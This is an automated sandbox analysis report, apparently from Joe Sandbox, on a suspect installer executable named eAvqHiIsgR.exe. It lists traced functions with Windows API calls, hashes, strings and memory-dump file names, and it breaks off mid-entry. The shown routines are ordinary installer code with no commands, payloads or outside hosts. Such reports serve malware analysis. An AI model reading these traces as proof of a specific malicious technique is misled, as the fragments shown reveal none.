                                                                • Opcode ID: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                                • Instruction ID: 2ba0dcbd17e821031ba3c657239c4b48ae58aa12c0a6ed8defdb88479dfe25c9
                                                                • Opcode Fuzzy Hash: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                                • Instruction Fuzzy Hash: CC61C2B1A00209BFDF10AF61DD45F6A3B69EB94754F00803AFB04BA1D1C7B8A951CF98
                                                                APIs
                                                                • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                • DrawTextA.USER32(00000000,sprjtelakeringer Setup,000000FF,00000010,00000820), ref: 00401156
                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                • String ID: F$sprjtelakeringer Setup
                                                                • API String ID: 941294808-4242612553
                                                                • Opcode ID: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                                • Instruction ID: fc049dc8deed713fddbaab3278265d12b48f61153473f3c5d5e2d7be2f7e1970
                                                                • Opcode Fuzzy Hash: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                                • Instruction Fuzzy Hash: 33417D71400249AFCF058FA5DE459AFBFB9FF44314F00802AF591AA1A0CB74D955DFA4
                                                                APIs
                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405EF7,?,?), ref: 00405D97
                                                                • GetShortPathNameA.KERNEL32(?,0042C620,00000400), ref: 00405DA0
                                                                  • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                                  • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                                • GetShortPathNameA.KERNEL32(?,0042CA20,00000400), ref: 00405DBD
                                                                • wsprintfA.USER32 ref: 00405DDB
                                                                • GetFileSize.KERNEL32(00000000,00000000,0042CA20,C0000000,00000004,0042CA20,?,?,?,?,?), ref: 00405E16
                                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E25
                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E5D
                                                                • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,0042C220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405EB3
                                                                • GlobalFree.KERNEL32(00000000), ref: 00405EC4
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405ECB
                                                                  • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\eAvqHiIsgR.exe,80000000,00000003), ref: 00405C94
                                                                  • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                • String ID: %s=%s$[Rename]
                                                                • API String ID: 2171350718-1727408572
                                                                • Opcode ID: bb326c4fff2569f995f741f5889aaa438d16cb529eb983989e6eb254c782141b
                                                                • Instruction ID: 2ccb2bf8dd744840d543bbc1a34bde763c5e5f86f0f2c8118c993f85f4779e4e
                                                                • Opcode Fuzzy Hash: bb326c4fff2569f995f741f5889aaa438d16cb529eb983989e6eb254c782141b
                                                                • Instruction Fuzzy Hash: 39310531600B15ABC2206B659D48F6B3A5CDF45755F14043BB981F62C2DF7CE9028AFD
                                                                APIs
                                                                • GlobalFree.KERNEL32(00000000), ref: 701A2447
                                                                  • Part of subcall function 701A1224: lstrcpynA.KERNEL32(00000000,?,701A12CF,-701A404B,701A11AB,-000000A0), ref: 701A1234
                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 701A23C2
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 701A23D7
                                                                • GlobalAlloc.KERNEL32(00000040,00000010), ref: 701A23E8
                                                                • CLSIDFromString.OLE32(00000000,00000000), ref: 701A23F6
                                                                • GlobalFree.KERNEL32(00000000), ref: 701A23FD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2965840144.00000000701A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 701A0000, based on PE: true
                                                                • Associated: 00000005.00000002.2965760512.00000000701A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000005.00000002.2965858277.00000000701A3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000005.00000002.2965878197.00000000701A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_701a0000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                • String ID: @H3w
                                                                • API String ID: 3730416702-4275297014
                                                                • Opcode ID: 223d28e353b9f72e5c6efe565c0039c4c3ebee2da5b255a583defaacaac09128
                                                                • Instruction ID: 81c151db388eff8e323e7a7f4ae2c88ddf846b7163e5fa571ae26a1d0510a120
                                                                • Opcode Fuzzy Hash: 223d28e353b9f72e5c6efe565c0039c4c3ebee2da5b255a583defaacaac09128
                                                                • Instruction Fuzzy Hash: BD419CFA508300DFE7118F28C944B6EB7E8FF49311F2148AAF546E6A91DB74E9048B61
                                                                APIs
                                                                • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\eAvqHiIsgR.exe",771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,00403323,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                                • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                                • CharNextA.USER32(?,"C:\Users\user\Desktop\eAvqHiIsgR.exe",771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,00403323,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                                • CharPrevA.USER32(?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000,00403323,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                                Strings
                                                                • "C:\Users\user\Desktop\eAvqHiIsgR.exe", xrefs: 0040640E
                                                                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004063D3
                                                                • *?|<>/":, xrefs: 0040641A
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: Char$Next$Prev
                                                                • String ID: "C:\Users\user\Desktop\eAvqHiIsgR.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                                                                • API String ID: 589700163-2094005846
                                                                • Opcode ID: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                                • Instruction ID: ed52d7626cbd5fe55056ecced6ac67fd73520a103458dc51ec5e44788bc33e0d
                                                                • Opcode Fuzzy Hash: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                                                                • Instruction Fuzzy Hash: 6B1104518047A169FB3207380C40B7B7F888B97764F1A447FE8C6722C2C67C5CA796AD
                                                                APIs
                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                                                                • MulDiv.KERNEL32(000D61EF,00000064,000D77A8), ref: 00402E00
                                                                • wsprintfA.USER32 ref: 00402E10
                                                                • SetWindowTextA.USER32(?,?), ref: 00402E20
                                                                • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402E32
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                • String ID: verifying installer: %d%%$a
                                                                • API String ID: 1451636040-323253276
                                                                • Opcode ID: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                                • Instruction ID: 65898b716c6b5e3943ed5d7f8865a7929710e3ce64d80c757a7a8fa3a9c1cc58
                                                                • Opcode Fuzzy Hash: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                                • Instruction Fuzzy Hash: BD01FF70640209FBEF20AF60DE4AEEE3769AB14345F008039FA06A51D0DBB59D55DB59
                                                                APIs
                                                                • GetWindowLongA.USER32(?,000000EB), ref: 004041FF
                                                                • GetSysColor.USER32(00000000), ref: 0040423D
                                                                • SetTextColor.GDI32(?,00000000), ref: 00404249
                                                                • SetBkMode.GDI32(?,?), ref: 00404255
                                                                • GetSysColor.USER32(?), ref: 00404268
                                                                • SetBkColor.GDI32(?,?), ref: 00404278
                                                                • DeleteObject.GDI32(?), ref: 00404292
                                                                • CreateBrushIndirect.GDI32(?), ref: 0040429C
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                • String ID:
                                                                • API String ID: 2320649405-0
                                                                • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                • Instruction ID: 212a8ad98d70f233ee07b83b669a1ba7ccffb4b50a3226e4c630c70d8ffb5278
                                                                • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                • Instruction Fuzzy Hash: 3B2165716007059BCB309F78DD08B5BBBF4AF85750B04896EFD96A22E0C738E814CB54
                                                                APIs
                                                                  • Part of subcall function 701A1215: GlobalAlloc.KERNELBASE(00000040,701A1233,?,701A12CF,-701A404B,701A11AB,-000000A0), ref: 701A121D
                                                                • GlobalFree.KERNEL32(?), ref: 701A25DE
                                                                • GlobalFree.KERNEL32(00000000), ref: 701A2618
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2965840144.00000000701A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 701A0000, based on PE: true
                                                                • Associated: 00000005.00000002.2965760512.00000000701A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000005.00000002.2965858277.00000000701A3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000005.00000002.2965878197.00000000701A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_701a0000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: Global$Free$Alloc
                                                                • String ID:
                                                                • API String ID: 1780285237-0
                                                                • Opcode ID: 05654a76f4380a55fea7bfafc7d2ddc5bee22f7b64cd7ac19a0a3c173a8b3e67
                                                                • Instruction ID: 96b08e8f70e59bab37ba26ce0f88e0c1f79ae37e9cb9428b8d351be4919e35bb
                                                                • Opcode Fuzzy Hash: 05654a76f4380a55fea7bfafc7d2ddc5bee22f7b64cd7ac19a0a3c173a8b3e67
                                                                • Instruction Fuzzy Hash: 7F41B3F6908200EFD3068F58CD95EAE77BAFB85310B2145ADF541A7610DB35AD04DB61
                                                                APIs
                                                                • lstrlenA.KERNEL32(0042A070,00000000,00424248,771B23A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                • lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,771B23A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                • lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,771B23A0), ref: 0040527A
                                                                • SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                                • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                                • SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                • String ID:
                                                                • API String ID: 2531174081-0
                                                                • Opcode ID: ffc7fd16b0850e8ca78275056b27aa311aff222ca9cd1cb1225c1906ca535124
                                                                • Instruction ID: 52f605d016cfd88bb70700c5a478074e15cc738f975766ab4ed8c3314b346ff2
                                                                • Opcode Fuzzy Hash: ffc7fd16b0850e8ca78275056b27aa311aff222ca9cd1cb1225c1906ca535124
                                                                • Instruction Fuzzy Hash: C721AC71900518BBDF119FA5DD8599FBFA8EF04354F1480BAF804B6291C7798E50CF98
                                                                APIs
                                                                • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404AE9
                                                                • GetMessagePos.USER32 ref: 00404AF1
                                                                • ScreenToClient.USER32(?,?), ref: 00404B0B
                                                                • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404B1D
                                                                • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B43
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: Message$Send$ClientScreen
                                                                • String ID: f
                                                                • API String ID: 41195575-1993550816
                                                                • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                • Instruction ID: cdc5f22e578355ebae6afd16dcadc4be4e42c2ab1ff41a6041c2d58f87c209b7
                                                                • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                • Instruction Fuzzy Hash: 33014C71900219BADB01DBA4DD85BFEBBBCAF55715F10012ABA40B61D0D6B4A9018BA4
                                                                APIs
                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                                                • GlobalFree.KERNEL32(?), ref: 0040288E
                                                                • GlobalFree.KERNEL32(00000000), ref: 004028A1
                                                                • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                                                                • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                • String ID:
                                                                • API String ID: 2667972263-0
                                                                • Opcode ID: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                                                                • Instruction ID: 50ad9526884773a844389ca9465edd1da2989015e588fa45899e7f45ead5980e
                                                                • Opcode Fuzzy Hash: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                                                                • Instruction Fuzzy Hash: 78216D72800128BBDF217FA5CE49D9E7A79EF09364F24423EF550762D1CA794D418FA8
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2965840144.00000000701A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 701A0000, based on PE: true
                                                                • Associated: 00000005.00000002.2965760512.00000000701A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000005.00000002.2965858277.00000000701A3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000005.00000002.2965878197.00000000701A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_701a0000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: FreeGlobal
                                                                • String ID:
                                                                • API String ID: 2979337801-0
                                                                • Opcode ID: e34f40a872f1bd9e679ef93b2b469ccd2e358b8cbaf43bde5955d80cf9faf550
                                                                • Instruction ID: a2013f1199a8c6c1d94e37fb8312f8d04963a2e5e98c5b2f995d5cca50b615ac
                                                                • Opcode Fuzzy Hash: e34f40a872f1bd9e679ef93b2b469ccd2e358b8cbaf43bde5955d80cf9faf550
                                                                • Instruction Fuzzy Hash: E25129FED001D4AEDB028FB8C9545AFBBBAAB44369F27005EE406E3B54C631AE41C751
                                                                APIs
                                                                • GetDlgItem.USER32(?,?), ref: 00401D7E
                                                                • GetClientRect.USER32(?,?), ref: 00401DCC
                                                                • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DFC
                                                                • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E10
                                                                • DeleteObject.GDI32(00000000), ref: 00401E20
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                • String ID:
                                                                • API String ID: 1849352358-0
                                                                • Opcode ID: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                                • Instruction ID: ea2313c62ec258575502bac7b5a91221d1b2f7c42d1e166e88532b570a834240
                                                                • Opcode Fuzzy Hash: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                                • Instruction Fuzzy Hash: 02212872A00109AFCB15DFA4DD85AAEBBB5EB48300F24417EF905F62A1DB389941DB54
                                                                APIs
                                                                • lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                                • wsprintfA.USER32 ref: 00404A6A
                                                                • SetDlgItemTextA.USER32(?,0042A890), ref: 00404A7D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
